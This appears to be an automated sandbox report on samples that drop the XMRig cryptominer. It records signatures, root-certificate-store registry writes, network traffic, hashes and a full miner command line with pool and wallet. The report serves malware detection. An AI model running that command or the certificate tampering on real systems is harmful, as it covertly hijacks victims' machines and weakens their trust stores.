N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.99:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 99.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
NL 23.62.61.99:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 201.64.52.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1136-16-0x000002BF78110000-0x000002BF78130000-memory.dmp

memory/1136-17-0x000002BF78160000-0x000002BF78180000-memory.dmp

memory/1136-18-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-19-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-20-0x000002BF78410000-0x000002BF78430000-memory.dmp

memory/1136-21-0x000002BF78430000-0x000002BF78450000-memory.dmp

memory/1136-22-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-24-0x000002BF78410000-0x000002BF78430000-memory.dmp

memory/1136-23-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-25-0x000002BF78430000-0x000002BF78450000-memory.dmp

memory/1136-26-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-27-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-28-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-29-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-30-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-31-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-32-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-33-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-34-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-35-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-36-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-37-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-38-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-39-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-40-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-41-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-42-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-43-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-44-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-45-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-46-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-47-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-48-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-49-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-50-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-51-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-52-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-53-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-54-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-55-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-56-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-57-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-58-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-59-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-60-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-61-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-62-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-63-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-64-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-65-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-66-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-67-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-68-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-69-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-70-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-71-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-72-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-73-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-74-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-75-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-76-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-77-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-78-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-79-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-80-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-81-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-82-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-83-0x00007FF606040000-0x00007FF606B43000-memory.dmp

memory/1136-84-0x00007FF606040000-0x00007FF606B43000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240226-en

Max time kernel

1796s

Max time network

1810s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4192 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 152.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.212.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1948-16-0x000002D5FDA90000-0x000002D5FDAB0000-memory.dmp

memory/1948-17-0x000002D5FDAD0000-0x000002D5FDAF0000-memory.dmp

memory/1948-18-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-21-0x000002D5FDAF0000-0x000002D5FDB10000-memory.dmp

memory/1948-20-0x000002D5FDB10000-0x000002D5FDB30000-memory.dmp

memory/1948-19-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-22-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-23-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-25-0x000002D5FDAF0000-0x000002D5FDB10000-memory.dmp

memory/1948-24-0x000002D5FDB10000-0x000002D5FDB30000-memory.dmp

memory/1948-26-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-27-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-28-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-29-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-30-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-31-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-32-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-33-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-34-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-35-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-36-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-37-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-38-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

